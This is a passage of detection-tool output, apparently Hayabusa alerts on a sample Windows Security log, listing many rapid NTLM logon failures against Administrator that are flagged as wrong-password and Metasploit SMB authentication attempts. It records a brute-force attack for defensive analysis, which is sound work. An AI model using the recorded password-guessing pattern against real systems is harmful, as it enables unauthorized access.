NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
